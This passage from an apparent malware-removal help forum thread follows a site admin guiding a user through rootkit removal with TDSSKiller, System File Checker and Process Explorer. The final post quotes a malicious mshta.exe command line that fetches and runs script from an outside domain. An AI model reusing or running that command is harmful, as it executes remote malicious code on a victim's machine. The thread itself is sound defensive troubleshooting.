2011/03/08 19:17:42.0843 4896 USB28xxOEM (d52f4fc7788d670a78b2c253717b5330) C:\WINDOWS\system32\DRIVERS\emOEM.sys
2011/03/08 19:17:42.0890 4896 usbaudio (e919708db44ed8543a7c017953148330) C:\WINDOWS\system32\drivers\usbaudio.sys
2011/03/08 19:17:42.0937 4896 usbbus (9419faac6552a51542dbba02971c841c) C:\WINDOWS\system32\DRIVERS\lgusbbus.sys
2011/03/08 19:17:42.0984 4896 usbccgp (173f317ce0db8e21322e71b7e60a27e8) C:\WINDOWS\system32\DRIVERS\usbccgp.sys
2011/03/08 19:17:43.0031 4896 UsbDiag (c0a466fa4ffec464320e159bc1bbdc0c) C:\WINDOWS\system32\DRIVERS\lgusbdiag.sys
2011/03/08 19:17:43.0078 4896 usbehci (65dcf09d0e37d4c6b11b5b0b76d470a7) C:\WINDOWS\system32\DRIVERS\usbehci.sys
2011/03/08 19:17:43.0125 4896 usbhub (1ab3cdde553b6e064d2e754efe20285c) C:\WINDOWS\system32\DRIVERS\usbhub.sys
2011/03/08 19:17:43.0171 4896 USBModem (f74a54774a9b0afeb3c40adec68aa600) C:\WINDOWS\system32\DRIVERS\lgusbmodem.sys
2011/03/08 19:17:43.0218 4896 usbprint (a717c8721046828520c9edf31288fc00) C:\WINDOWS\system32\DRIVERS\usbprint.sys
2011/03/08 19:17:43.0281 4896 usbscan (a0b8cf9deb1184fbdd20784a58fa75d4) C:\WINDOWS\system32\DRIVERS\usbscan.sys
2011/03/08 19:17:43.0312 4896 usbser (1c888b000c2f9492f4b15b5b6b84873e) C:\WINDOWS\system32\DRIVERS\usbser.sys
2011/03/08 19:17:43.0359 4896 usbstor (a32426d9b14a089eaa1d922e0c5801a9) C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS
2011/03/08 19:17:43.0390 4896 usbuhci (26496f9dee2d787fc3e61ad54821ffe6) C:\WINDOWS\system32\DRIVERS\usbuhci.sys
2011/03/08 19:17:43.0421 4896 VgaSave (0d3a8fafceacd8b7625cd549757a7df1) C:\WINDOWS\System32\drivers\vga.sys
2011/03/08 19:17:43.0468 4896 VolSnap (4c8fcb5cc53aab716d810740fe59d025) C:\WINDOWS\system32\drivers\VolSnap.sys
2011/03/08 19:17:43.0531 4896 Wanarp (e20b95baedb550f32dd489265c1da1f6) C:\WINDOWS\system32\DRIVERS\wanarp.sys
2011/03/08 19:17:43.0625 4896 wdmaud (6768acf64b18196494413695f0c3a00f) C:\WINDOWS\system32\drivers\wdmaud.sys
2011/03/08 19:17:43.0718 4896 winachsf (ce545a84bf3411e7516fa8da51ad9d93) C:\WINDOWS\system32\DRIVERS\HSF_CNXT.sys
2011/03/08 19:17:43.0890 4896 WpdUsb (cf4def1bf66f06964dc0d91844239104) C:\WINDOWS\system32\DRIVERS\wpdusb.sys
2011/03/08 19:17:43.0937 4896 WSTCODEC (c98b39829c2bbd34e454150633c62c78) C:\WINDOWS\system32\DRIVERS\WSTCODEC.SYS
2011/03/08 19:17:43.0984 4896 WudfPf (f15feafffbb3644ccc80c5da584e6311) C:\WINDOWS\system32\DRIVERS\WudfPf.sys
2011/03/08 19:17:44.0015 4896 WUDFRd (28b524262bce6de1f7ef9f510ba3985b) C:\WINDOWS\system32\DRIVERS\WUDFRd.sys
2011/03/08 19:17:44.0078 4896 \HardDisk0 - detected Rootkit.Win32.TDSS.tdl4 (0)
2011/03/08 19:17:44.0078 4896 ================================================================================
2011/03/08 19:17:44.0078 4896 Scan finished
2011/03/08 19:17:44.0078 4896 ================================================================================
2011/03/08 19:17:44.0078 4440 Detected object count: 1
2011/03/08 19:18:13.0578 4440 \HardDisk0 - will be cured after reboot
2011/03/08 19:18:13.0578 4440 Rootkit.Win32.TDSS.tdl4(\HardDisk0) - User select action: Cure
2011/03/08 19:18:20.0968 2624 Deinitialize success





Everything seems to be working so far.



Adam

#6 Blade

Blade

    Strong in the Bleepforce


  • Site Admin
  • 12,702 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:US
  • Local time:12:33 AM

Posted 09 March 2011 - 01:27 PM

Hello.

Appears that TDSSKiller took out a rootkit.

Please put the machine through its paces, and let me know if everything appears to be working properly.

~Blade

Posted Image

If I am helping you, it has been 48 hours since your last post, and I have yet to reply to your topic, please send me a PM
Become a BleepingComputer fan: Facebook
Follow us on Twitter!
Circle us on Google+


#7 Adam36

Adam36
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Local time:11:33 PM

Posted 13 March 2011 - 09:28 PM

Blade,

Looks like everything seems to be working, but I do notice I still have one problem. mshta.exe keeps coming up multiple times. As Im typing this I have 10 of them running. Im not sure if this is some type of malware, or something else.

Thanks again


Adam

#8 Blade

Blade

    Strong in the Bleepforce


  • Site Admin
  • 12,702 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:US
  • Local time:12:33 AM

Posted 14 March 2011 - 01:20 AM

Hello.

Do you have an XP CD available?

Posted Image

If I am helping you, it has been 48 hours since your last post, and I have yet to reply to your topic, please send me a PM
Become a BleepingComputer fan: Facebook
Follow us on Twitter!
Circle us on Google+


#9 Adam36

Adam36
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Local time:11:33 PM

Posted 15 March 2011 - 04:19 PM

Blade,
I have the "restore DVD" that came with this computer. I also have a "windows XP operating system" from another computer I bought, but I'm not sure if it will work with this computer?

#10 Blade

Blade

    Strong in the Bleepforce


  • Site Admin
  • 12,702 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:US
  • Local time:12:33 AM

Posted 17 March 2011 - 06:37 AM

Hello.

What version of XP are you running on this machine, and what version is the CD?

Posted Image

If I am helping you, it has been 48 hours since your last post, and I have yet to reply to your topic, please send me a PM
Become a BleepingComputer fan: Facebook
Follow us on Twitter!
Circle us on Google+


#11 Adam36

Adam36
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Local time:11:33 PM

Posted 17 March 2011 - 06:33 PM

Hi,

I'm running Home Edition Version 2002 Service pack 3.

The one CD is from an older computer its Home Edition Version 1.

#12 Blade

Blade

    Strong in the Bleepforce


  • Site Admin
  • 12,702 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:US
  • Local time:12:33 AM

Posted 19 March 2011 - 05:31 PM

Hello.

Let's try this.

Let's run the Windows System File Checker utility

You will need your XP CD handy.

Open Windows Task Manager....by pressing CTRL+SHIFT+ESC

Then click File.. then New Task(Run)

In the box that opens type sfc /scannow ......There is a space between c and /

Click OK
Let it run and insert the XP CD when asked.


Let me know what happens, and how your computer behaves after running the utility.

Posted Image

If I am helping you, it has been 48 hours since your last post, and I have yet to reply to your topic, please send me a PM
Become a BleepingComputer fan: Facebook
Follow us on Twitter!
Circle us on Google+


#13 Adam36

Adam36
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Local time:11:33 PM

Posted 22 March 2011 - 07:39 PM

Blade, I ran the Windows System File Checker utility, but I'm not sure if this is right or not? I did everything instructed to do and a window came up that told me to "Please wait while windows verifies that all protected windows files are intact and in their original versions". This took awhile so I left it. I came back about 20 minutes later and it had closed out? It never asked me to insert the CD. I tried it a second time and it did the same thing. Is this correct or am I doing something wrong?

#14 Blade

Blade

    Strong in the Bleepforce


  • Site Admin
  • 12,702 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:US
  • Local time:12:33 AM

Posted 24 March 2011 - 05:08 AM

If it didn't ask for the CD. . . then it either didn't find anything wrong. . . or it managed to repair everything with onboard backups.


Please download Process Explorer.

Launch the utility once it is downloaded.

Right-click a mshta.exe process and select Properties > Image. Copy what you see in the Command line: box and paste it in your next reply.

~Blade

Posted Image

If I am helping you, it has been 48 hours since your last post, and I have yet to reply to your topic, please send me a PM
Become a BleepingComputer fan: Facebook
Follow us on Twitter!
Circle us on Google+


#15 Adam36

Adam36
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Local time:11:33 PM

Posted 24 March 2011 - 09:01 PM

That's a pretty neat Utility!

mshta.exe http://funnypinguinshow.com/sdad.php?kxasdasddkhjk=




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users